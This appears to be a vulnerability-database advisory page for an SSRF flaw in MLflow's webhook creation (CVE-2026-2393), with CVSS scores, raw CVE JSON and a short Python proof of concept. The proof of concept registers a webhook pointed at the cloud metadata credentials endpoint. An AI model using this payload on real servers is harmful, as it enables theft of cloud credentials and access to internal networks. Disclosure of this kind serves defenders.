Security Vulnerability Report
中文
CVE-2026-2393 CVSS 7.1 HIGH

CVE-2026-2393

Published: 2026-05-11 18:16:32
Last Modified: 2026-05-11 20:25:41
Source: [email protected]

Description

A Server-Side Request Forgery (SSRF) vulnerability exists in MLflow versions prior to 3.9.0. The `_create_webhook()` function in `mlflow/server/handlers.py` accepts a user-controlled `url` parameter without validation, and the `_send_webhook_request()` function in `mlflow/webhooks/delivery.py` sends HTTP POST requests to this attacker-controlled URL. This allows an authenticated attacker to force the MLflow backend to send HTTP requests to internal services, cloud metadata endpoints, or arbitrary external servers. The lack of input sanitization, URL scheme filtering, or allowlist validation on the webhook URL enables exploitation, potentially leading to cloud credential theft, internal network access, and data exfiltration.

CVSS Details

CVSS Score
7.1
Severity
HIGH
CVSS Vector
CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N

Configurations (Affected Products)

No configuration data available.

MLflow < 3.9.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # PoC for CVE-2026-2393: MLflow SSRF # Target: MLflow server instance target_url = "http://localhost:5000/api/2.0/mlflow/webhooks/create" # Attacker controlled URL (e.g., Cloud Metadata Service) malicious_url = "http://169.254.169.254/latest/meta-data/iam/security-credentials/" payload = { "name": "exploit_webhook", "events": ["MODEL_VERSION_TRANSITIONED_STAGE"], "http_url_spec": { "url": malicious_url, "authorization": "Bearer dummy_token" } } # Send the malicious request response = requests.post(target_url, json=payload) if response.status_code == 200: print("[+] Webhook created successfully. SSRF triggered.") else: print(f"[-] Failed to create webhook. Status: {response.status_code}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-2393", "sourceIdentifier": "[email protected]", "published": "2026-05-11T18:16:31.500", "lastModified": "2026-05-11T20:25:41.320", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "A Server-Side Request Forgery (SSRF) vulnerability exists in MLflow versions prior to 3.9.0. The `_create_webhook()` function in `mlflow/server/handlers.py` accepts a user-controlled `url` parameter without validation, and the `_send_webhook_request()` function in `mlflow/webhooks/delivery.py` sends HTTP POST requests to this attacker-controlled URL. This allows an authenticated attacker to force the MLflow backend to send HTTP requests to internal services, cloud metadata endpoints, or arbitrary external servers. The lack of input sanitization, URL scheme filtering, or allowlist validation on the webhook URL enables exploitation, potentially leading to cloud credential theft, internal network access, and data exfiltration."}], "metrics": {"cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 4.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-918"}]}], "references": [{"url": "https://github.com/mlflow/mlflow/commit/64aa0ab7207f9c649b59ba1a5f40d82196817389", "source": "[email protected]"}, {"url": "https://huntr.com/bounties/04ef100d-06b5-4a70-95b1-b7be23aa8150", "source": "[email protected]"}, {"url": "https://huntr.com/bounties/04ef100d-06b5-4a70-95b1-b7be23aa8150", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.